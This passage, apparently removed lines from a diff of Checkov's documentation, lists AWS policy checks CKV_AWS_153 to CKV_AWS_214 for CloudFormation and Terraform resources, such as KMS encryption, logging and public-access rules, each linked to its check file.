-|  515 | CKV_AWS_153              | resource                         | aws_autoscaling_group                                                                            | Autoscaling groups should supply tags to launch configurations                                                                                                                                           | Terraform               | [AutoScalingTagging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AutoScalingTagging.py)                                                                                   |
-|  516 | CKV_AWS_154              | resource                         | AWS::Redshift::Cluster                                                                           | Ensure Redshift is not deployed outside of a VPC                                                                                                                                                         | Cloudformation          | [RedshiftInEc2ClassicMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftInEc2ClassicMode.py)                                                                  |
-|  517 | CKV_AWS_154              | resource                         | aws_redshift_cluster                                                                             | Ensure Redshift is not deployed outside of a VPC                                                                                                                                                         | Terraform               | [RedshiftInEc2ClassicMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftInEc2ClassicMode.py)                                                                       |
-|  518 | CKV_AWS_155              | resource                         | AWS::WorkSpaces::Workspace                                                                       | Ensure that Workspace user volumes are encrypted                                                                                                                                                         | Cloudformation          | [WorkspaceUserVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WorkspaceUserVolumeEncrypted.py)                                                          |
-|  519 | CKV_AWS_155              | resource                         | aws_workspaces_workspace                                                                         | Ensure that Workspace user volumes are encrypted                                                                                                                                                         | Terraform               | [WorkspaceUserVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WorkspaceUserVolumeEncrypted.py)                                                               |
-|  520 | CKV_AWS_156              | resource                         | AWS::WorkSpaces::Workspace                                                                       | Ensure that Workspace root volumes are encrypted                                                                                                                                                         | Cloudformation          | [WorkspaceRootVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WorkspaceRootVolumeEncrypted.py)                                                          |
-|  521 | CKV_AWS_156              | resource                         | aws_workspaces_workspace                                                                         | Ensure that Workspace root volumes are encrypted                                                                                                                                                         | Terraform               | [WorkspaceRootVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WorkspaceRootVolumeEncrypted.py)                                                               |
-|  522 | CKV_AWS_157              | resource                         | AWS::RDS::DBInstance                                                                             | Ensure that RDS instances have Multi-AZ enabled                                                                                                                                                          | Cloudformation          | [RDSMultiAZEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSMultiAZEnabled.py)                                                                                |
-|  523 | CKV_AWS_157              | resource                         | aws_db_instance                                                                                  | Ensure that RDS instances have Multi-AZ enabled                                                                                                                                                          | Terraform               | [RDSMultiAZEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSMultiAZEnabled.py)                                                                                     |
-|  524 | CKV_AWS_158              | resource                         | AWS::Logs::LogGroup                                                                              | Ensure that CloudWatch Log Group is encrypted by KMS                                                                                                                                                     | Cloudformation          | [CloudWatchLogGroupKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudWatchLogGroupKMSKey.py)                                                                  |
-|  525 | CKV_AWS_158              | resource                         | aws_cloudwatch_log_group                                                                         | Ensure that CloudWatch Log Group is encrypted by KMS                                                                                                                                                     | Terraform               | [CloudWatchLogGroupKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupKMSKey.py)                                                                       |
-|  526 | CKV_AWS_159              | resource                         | aws_athena_workgroup                                                                             | Ensure that Athena Workgroup is encrypted                                                                                                                                                                | Terraform               | [AthenaWorkgroupEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaWorkgroupEncryption.py)                                                                     |
-|  527 | CKV_AWS_160              | resource                         | AWS::Timestream::Database                                                                        | Ensure that Timestream database is encrypted with KMS CMK                                                                                                                                                | Cloudformation          | [TimestreamDatabaseKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/TimestreamDatabaseKMSKey.py)                                                                  |
-|  528 | CKV_AWS_160              | resource                         | aws_timestreamwrite_database                                                                     | Ensure that Timestream database is encrypted with KMS CMK                                                                                                                                                | Terraform               | [TimestreamDatabaseKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TimestreamDatabaseKMSKey.py)                                                                       |
-|  529 | CKV_AWS_161              | resource                         | AWS::RDS::DBInstance                                                                             | Ensure RDS database has IAM authentication enabled                                                                                                                                                       | Cloudformation          | [RDSIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSIAMAuthentication.py)                                                                          |
-|  530 | CKV_AWS_161              | resource                         | aws_db_instance                                                                                  | Ensure RDS database has IAM authentication enabled                                                                                                                                                       | Terraform               | [RDSIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSIAMAuthentication.py)                                                                               |
-|  531 | CKV_AWS_162              | resource                         | AWS::RDS::DBCluster                                                                              | Ensure RDS cluster has IAM authentication enabled                                                                                                                                                        | Cloudformation          | [RDSClusterIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSClusterIAMAuthentication.py)                                                            |
-|  532 | CKV_AWS_162              | resource                         | aws_rds_cluster                                                                                  | Ensure RDS cluster has IAM authentication enabled                                                                                                                                                        | Terraform               | [RDSClusterIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterIAMAuthentication.py)                                                                 |
-|  533 | CKV_AWS_163              | resource                         | AWS::ECR::Repository                                                                             | Ensure ECR image scanning on push is enabled                                                                                                                                                             | Cloudformation          | [ECRImageScanning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRImageScanning.py)                                                                                  |
-|  534 | CKV_AWS_163              | resource                         | aws_ecr_repository                                                                               | Ensure ECR image scanning on push is enabled                                                                                                                                                             | Terraform               | [ECRImageScanning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRImageScanning.py)                                                                                       |
-|  535 | CKV_AWS_164              | resource                         | AWS::Transfer::Server                                                                            | Ensure Transfer Server is not exposed publicly.                                                                                                                                                          | Cloudformation          | [TransferServerIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/TransferServerIsPublic.py)                                                                      |
-|  536 | CKV_AWS_164              | resource                         | aws_transfer_server                                                                              | Ensure Transfer Server is not exposed publicly.                                                                                                                                                          | Terraform               | [TransferServerIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TransferServerIsPublic.py)                                                                           |
-|  537 | CKV_AWS_165              | resource                         | AWS::DynamoDB::GlobalTable                                                                       | Ensure DynamoDB global table point in time recovery (backup) is enabled                                                                                                                                  | Cloudformation          | [DynamodbGlobalTableRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamodbGlobalTableRecovery.py)                                                            |
-|  538 | CKV_AWS_165              | resource                         | aws_dynamodb_global_table                                                                        | Ensure DynamoDB point in time recovery (backup) is enabled for global tables                                                                                                                             | Terraform               | [DynamoDBGlobalTableRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBGlobalTableRecovery.py)                                                                 |
-|  539 | CKV_AWS_166              | resource                         | AWS::Backup::BackupVault                                                                         | Ensure Backup Vault is encrypted at rest using KMS CMK                                                                                                                                                   | Cloudformation          | [BackupVaultEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/BackupVaultEncrypted.py)                                                                          |
-|  540 | CKV_AWS_166              | resource                         | aws_backup_vault                                                                                 | Ensure Backup Vault is encrypted at rest using KMS CMK                                                                                                                                                   | Terraform               | [BackupVaultEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/BackupVaultEncrypted.py)                                                                               |
-|  541 | CKV_AWS_167              | resource                         | aws_glacier_vault                                                                                | Ensure Glacier Vault access policy is not public by only allowing specific services or principals to access it                                                                                           | Terraform               | [GlacierVaultAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlacierVaultAnyPrincipal.py)                                                                       |
-|  542 | CKV_AWS_168              | resource                         | aws_sqs_queue                                                                                    | Ensure SQS queue policy is not public by only allowing specific services or principals to access it                                                                                                      | Terraform               | [SQSQueuePolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueuePolicyAnyPrincipal.py)                                                                   |
-|  543 | CKV_AWS_168              | resource                         | aws_sqs_queue_policy                                                                             | Ensure SQS queue policy is not public by only allowing specific services or principals to access it                                                                                                      | Terraform               | [SQSQueuePolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueuePolicyAnyPrincipal.py)                                                                   |
-|  544 | CKV_AWS_169              | resource                         | aws_sns_topic_policy                                                                             | Ensure SNS topic policy is not public by only allowing specific services or principals to access it                                                                                                      | Terraform               | [SNSTopicPolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SNSTopicPolicyAnyPrincipal.py)                                                                   |
-|  545 | CKV_AWS_170              | resource                         | AWS::QLDB::Ledger                                                                                | Ensure QLDB ledger permissions mode is set to STANDARD                                                                                                                                                   | Cloudformation          | [QLDBLedgerPermissionsMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/QLDBLedgerPermissionsMode.py)                                                                |
-|  546 | CKV_AWS_170              | resource                         | aws_qldb_ledger                                                                                  | Ensure QLDB ledger permissions mode is set to STANDARD                                                                                                                                                   | Terraform               | [QLDBLedgerPermissionsMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/QLDBLedgerPermissionsMode.py)                                                                     |
-|  547 | CKV_AWS_171              | resource                         | aws_emr_security_configuration                                                                   | Ensure EMR Cluster security configuration encryption is using SSE-KMS                                                                                                                                    | Terraform               | [EMRClusterIsEncryptedKMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterIsEncryptedKMS.py)                                                                       |
-|  548 | CKV_AWS_172              | resource                         | AWS::QLDB::Ledger                                                                                | Ensure QLDB ledger has deletion protection enabled                                                                                                                                                       | Cloudformation          | [QLDBLedgerDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/QLDBLedgerDeletionProtection.py)                                                          |
-|  549 | CKV_AWS_172              | resource                         | aws_qldb_ledger                                                                                  | Ensure QLDB ledger has deletion protection enabled                                                                                                                                                       | Terraform               | [QLDBLedgerDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/QLDBLedgerDeletionProtection.py)                                                               |
-|  550 | CKV_AWS_173              | resource                         | AWS::Lambda::Function                                                                            | Check encryption settings for Lambda environment variable                                                                                                                                                | Cloudformation          | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py)                                            |
-|  551 | CKV_AWS_173              | resource                         | AWS::Serverless::Function                                                                        | Check encryption settings for Lambda environment variable                                                                                                                                                | Cloudformation          | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py)                                            |
-|  552 | CKV_AWS_173              | resource                         | aws_lambda_function                                                                              | Check encryption settings for Lambda environmental variable                                                                                                                                              | Terraform               | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py)                                                 |
-|  553 | CKV_AWS_174              | resource                         | AWS::CloudFront::Distribution                                                                    | Verify CloudFront Distribution Viewer Certificate is using TLS v1.2                                                                                                                                      | Cloudformation          | [CloudFrontTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudFrontTLS12.py)                                                                                    |
-|  554 | CKV_AWS_174              | resource                         | aws_cloudfront_distribution                                                                      | Verify CloudFront Distribution Viewer Certificate is using TLS v1.2                                                                                                                                      | Terraform               | [CloudfrontTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontTLS12.py)                                                                                         |
-|  555 | CKV_AWS_175              | resource                         | aws_waf_web_acl                                                                                  | Ensure WAF has associated rules                                                                                                                                                                          | Terraform               | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py)                                                                                           |
-|  556 | CKV_AWS_175              | resource                         | aws_wafregional_web_acl                                                                          | Ensure WAF has associated rules                                                                                                                                                                          | Terraform               | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py)                                                                                           |
-|  557 | CKV_AWS_175              | resource                         | aws_wafv2_web_acl                                                                                | Ensure WAF has associated rules                                                                                                                                                                          | Terraform               | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py)                                                                                           |
-|  558 | CKV_AWS_176              | resource                         | aws_waf_web_acl                                                                                  | Ensure Logging is enabled for WAF Web Access Control Lists                                                                                                                                               | Terraform               | [WAFHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasLogs.py)                                                                                                   |
-|  559 | CKV_AWS_176              | resource                         | aws_wafregional_web_acl                                                                          | Ensure Logging is enabled for WAF Web Access Control Lists                                                                                                                                               | Terraform               | [WAFHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasLogs.py)                                                                                                   |
-|  560 | CKV_AWS_177              | resource                         | aws_kinesis_video_stream                                                                         | Ensure Kinesis Video Stream is encrypted by KMS using a customer managed Key (CMK)                                                                                                                       | Terraform               | [KinesisVideoEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisVideoEncryptedWithCMK.py)                                                               |
-|  561 | CKV_AWS_178              | resource                         | aws_fsx_ontap_file_system                                                                        | Ensure fx ontap file system is encrypted by KMS using a customer managed Key (CMK)                                                                                                                       | Terraform               | [FSXOntapFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXOntapFSEncryptedWithCMK.py)                                                                   |
-|  562 | CKV_AWS_179              | resource                         | aws_fsx_windows_file_system                                                                      | Ensure FSX Windows filesystem is encrypted by KMS using a customer managed Key (CMK)                                                                                                                     | Terraform               | [FSXWindowsFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXWindowsFSEncryptedWithCMK.py)                                                               |
-|  563 | CKV_AWS_180              | resource                         | aws_imagebuilder_component                                                                       | Ensure Image Builder component is encrypted by KMS using a customer managed Key (CMK)                                                                                                                    | Terraform               | [ImagebuilderComponentEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderComponentEncryptedWithCMK.py)                                             |
-|  564 | CKV_AWS_181              | resource                         | aws_s3_object_copy                                                                               | Ensure S3 Object Copy is encrypted by KMS using a customer managed Key (CMK)                                                                                                                             | Terraform               | [S3ObjectCopyEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ObjectCopyEncryptedWithCMK.py)                                                               |
-|  565 | CKV_AWS_182              | resource                         | aws_docdb_cluster                                                                                | Ensure DocumentDB is encrypted by KMS using a customer managed Key (CMK)                                                                                                                                 | Terraform               | [DocDBEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBEncryptedWithCMK.py)                                                                             |
-|  566 | CKV_AWS_183              | resource                         | aws_ebs_snapshot_copy                                                                            | Ensure EBS Snapshot Copy is encrypted by KMS using a customer managed Key (CMK)                                                                                                                          | Terraform               | [EBSSnapshotCopyEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSSnapshotCopyEncryptedWithCMK.py)                                                         |
-|  567 | CKV_AWS_184              | resource                         | aws_efs_file_system                                                                              | Ensure resource is encrypted by KMS using a customer managed Key (CMK)                                                                                                                                   | Terraform               | [EFSFileSystemEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSFileSystemEncryptedWithCMK.py)                                                             |
-|  568 | CKV_AWS_185              | resource                         | aws_kinesis_stream                                                                               | Ensure Kinesis Stream is encrypted by KMS using a customer managed Key (CMK)                                                                                                                             | Terraform               | [KinesisStreamEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisStreamEncryptedWithCMK.py)                                                             |
-|  569 | CKV_AWS_186              | resource                         | aws_s3_bucket_object                                                                             | Ensure S3 bucket Object is encrypted by KMS using a customer managed Key (CMK)                                                                                                                           | Terraform               | [S3BucketObjectEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BucketObjectEncryptedWithCMK.py)                                                           |
-|  570 | CKV_AWS_187              | resource                         | aws_sagemaker_domain                                                                             | Ensure Sagemaker domain is encrypted by KMS using a customer managed Key (CMK)                                                                                                                           | Terraform               | [SagemakerDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py)                                                         |
-|  571 | CKV_AWS_189              | resource                         | aws_ebs_volume                                                                                   | Ensure EBS Volume is encrypted by KMS using a customer managed Key (CMK)                                                                                                                                 | Terraform               | [EBSVolumeEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSVolumeEncryptedWithCMK.py)                                                                     |
-|  572 | CKV_AWS_190              | resource                         | aws_fsx_lustre_file_system                                                                       | Ensure lustre file systems is encrypted by KMS using a customer managed Key (CMK)                                                                                                                        | Terraform               | [LustreFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LustreFSEncryptedWithCMK.py)                                                                       |
-|  573 | CKV_AWS_191              | resource                         | aws_elasticache_replication_group                                                                | Ensure ElastiCache replication group is encrypted by KMS using a customer managed Key (CMK)                                                                                                              | Terraform               | [ElasticacheReplicationGroupEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptedWithCMK.py)                                 |
-|  574 | CKV_AWS_192              | resource                         | AWS::WAFv2::WebACL                                                                               | Ensure WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell                                                                                                                          | Cloudformation          | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WAFACLCVE202144228.py)                                                                              |
-|  575 | CKV_AWS_192              | resource                         | aws_wafv2_web_acl                                                                                | Ensure WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell                                                                                                                          | Terraform               | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFACLCVE202144228.py)                                                                                   |
-|  576 | CKV_AWS_193              | resource                         | AWS::AppSync::GraphQLApi                                                                         | Ensure AppSync has Logging enabled                                                                                                                                                                       | Cloudformation          | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncLogging.py)                                                                                      |
-|  577 | CKV_AWS_193              | resource                         | aws_appsync_graphql_api                                                                          | Ensure AppSync has Logging enabled                                                                                                                                                                       | Terraform               | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppSyncLogging.py)                                                                                           |
-|  578 | CKV_AWS_194              | resource                         | AWS::AppSync::GraphQLApi                                                                         | Ensure AppSync has Field-Level logs enabled                                                                                                                                                              | Cloudformation          | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncFieldLevelLogs.py)                                                                        |
-|  579 | CKV_AWS_194              | resource                         | aws_appsync_graphql_api                                                                          | Ensure AppSync has Field-Level logs enabled                                                                                                                                                              | Terraform               | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppSyncFieldLevelLogs.py)                                                                             |
-|  580 | CKV_AWS_195              | resource                         | AWS::Glue::Crawler                                                                               | Ensure Glue component has a security configuration associated                                                                                                                                            | Cloudformation          | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py)                                                  |
-|  581 | CKV_AWS_195              | resource                         | AWS::Glue::DevEndpoint                                                                           | Ensure Glue component has a security configuration associated                                                                                                                                            | Cloudformation          | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py)                                                  |
-|  582 | CKV_AWS_195              | resource                         | AWS::Glue::Job                                                                                   | Ensure Glue component has a security configuration associated                                                                                                                                            | Cloudformation          | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py)                                                  |
-|  583 | CKV_AWS_195              | resource                         | aws_glue_crawler                                                                                 | Ensure Glue component has a security configuration associated                                                                                                                                            | Terraform               | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py)                                                       |
-|  584 | CKV_AWS_195              | resource                         | aws_glue_dev_endpoint                                                                            | Ensure Glue component has a security configuration associated                                                                                                                                            | Terraform               | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py)                                                       |
-|  585 | CKV_AWS_195              | resource                         | aws_glue_job                                                                                     | Ensure Glue component has a security configuration associated                                                                                                                                            | Terraform               | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py)                                                       |
-|  586 | CKV_AWS_196              | resource                         | aws_elasticache_security_group                                                                   | Ensure no aws_elasticache_security_group resources exist                                                                                                                                                 | Terraform               | [ElasticacheHasSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheHasSecurityGroup.py)                                                                 |
-|  587 | CKV_AWS_197              | resource                         | AWS::AmazonMQ::Broker                                                                            | Ensure MQ Broker Audit logging is enabled                                                                                                                                                                | Cloudformation          | [MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MQBrokerAuditLogging.py)                                                                          |
-|  588 | CKV_AWS_197              | resource                         | aws_mq_broker                                                                                    | Ensure MQ Broker Audit logging is enabled                                                                                                                                                                | Terraform               | [MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerAuditLogging.py)                                                                               |
-|  589 | CKV_AWS_198              | resource                         | aws_db_security_group                                                                            | Ensure no aws_db_security_group resources exist                                                                                                                                                          | Terraform               | [RDSHasSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSHasSecurityGroup.py)                                                                                 |
-|  590 | CKV_AWS_199              | resource                         | aws_imagebuilder_distribution_configuration                                                      | Ensure Image Builder Distribution Configuration encrypts AMI's using KMS - a customer managed Key (CMK)                                                                                                  | Terraform               | [ImagebuilderDistributionConfigurationEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderDistributionConfigurationEncryptedWithCMK.py)             |
-|  591 | CKV_AWS_200              | resource                         | aws_imagebuilder_image_recipe                                                                    | Ensure that Image Recipe EBS Disk are encrypted with CMK                                                                                                                                                 | Terraform               | [ImagebuilderImageRecipeEBSEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderImageRecipeEBSEncrypted.py)                                                 |
-|  592 | CKV_AWS_201              | resource                         | aws_memorydb_cluster                                                                             | Ensure MemoryDB is encrypted at rest using KMS CMKs                                                                                                                                                      | Terraform               | [MemoryDBEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBEncryptionWithCMK.py)                                                                     |
-|  593 | CKV_AWS_202              | resource                         | aws_memorydb_cluster                                                                             | Ensure MemoryDB data is encrypted in transit                                                                                                                                                             | Terraform               | [MemoryDBClusterIntransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBClusterIntransitEncryption.py)                                                   |
-|  594 | CKV_AWS_203              | resource                         | aws_fsx_openzfs_file_system                                                                      | Ensure resource is encrypted by KMS using a customer managed Key (CMK)                                                                                                                                   | Terraform               | [FSXOpenZFSFileSystemEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXOpenZFSFileSystemEncryptedWithCMK.py)                                               |
-|  595 | CKV_AWS_204              | resource                         | aws_ami                                                                                          | Ensure AMIs are encrypted using KMS CMKs                                                                                                                                                                 | Terraform               | [AMIEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMIEncryption.py)                                                                                             |
-|  596 | CKV_AWS_205              | resource                         | aws_ami_launch_permission                                                                        | Ensure to Limit AMI launch Permissions                                                                                                                                                                   | Terraform               | [AMILaunchIsShared.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMILaunchIsShared.py)                                                                                     |
-|  597 | CKV_AWS_206              | resource                         | aws_api_gateway_domain_name                                                                      | Ensure API Gateway Domain uses a modern security Policy                                                                                                                                                  | Terraform               | [APIGatewayDomainNameTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayDomainNameTLS.py)                                                                         |
-|  598 | CKV_AWS_207              | resource                         | aws_mq_broker                                                                                    | Ensure MQ Broker minor version updates are enabled                                                                                                                                                       | Terraform               | [MQBrokerMinorAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerMinorAutoUpgrade.py)                                                                       |
-|  599 | CKV_AWS_208              | resource                         | aws_mq_broker                                                                                    | Ensure MQ Broker version is current                                                                                                                                                                      | Terraform               | [MQBrokerVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerVersion.py)                                                                                         |
-|  600 | CKV_AWS_208              | resource                         | aws_mq_configuration                                                                             | Ensure MQ Broker version is current                                                                                                                                                                      | Terraform               | [MQBrokerVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerVersion.py)                                                                                         |
-|  601 | CKV_AWS_209              | resource                         | aws_mq_broker                                                                                    | Ensure MQ broker encrypted by KMS using a customer managed Key (CMK)                                                                                                                                     | Terraform               | [MQBrokerEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerEncryptedWithCMK.py)                                                                       |
-|  602 | CKV_AWS_210              | resource                         | aws_batch_job_definition                                                                         | Batch job does not define a privileged container                                                                                                                                                         | Terraform               | [BatchJobIsNotPrivileged.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/BatchJobIsNotPrivileged.py)                                                                         |
-|  603 | CKV_AWS_211              | resource                         | aws_db_instance                                                                                  | Ensure RDS uses a modern CaCert                                                                                                                                                                          | Terraform               | [RDSCACertIsRecent.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSCACertIsRecent.py)                                                                                     |
-|  604 | CKV_AWS_212              | resource                         | aws_dms_replication_instance                                                                     | Ensure DMS replication instance is encrypted by KMS using a customer managed Key (CMK)                                                                                                                   | Terraform               | [DMSReplicationInstanceEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstanceEncryptedWithCMK.py)                                           |
-|  605 | CKV_AWS_213              | resource                         | aws_load_balancer_policy                                                                         | Ensure ELB Policy uses only secure protocols                                                                                                                                                             | Terraform               | [ELBPolicyUsesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBPolicyUsesSecureProtocols.py)                                                               |
-|  606 | CKV_AWS_214              | resource                         | aws_appsync_api_cache                                                                            | Ensure AppSync API Cache is encrypted at rest                                                                                                                                                            | Terraform               | [AppsyncAPICacheEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionAtRest.py)                                                         |
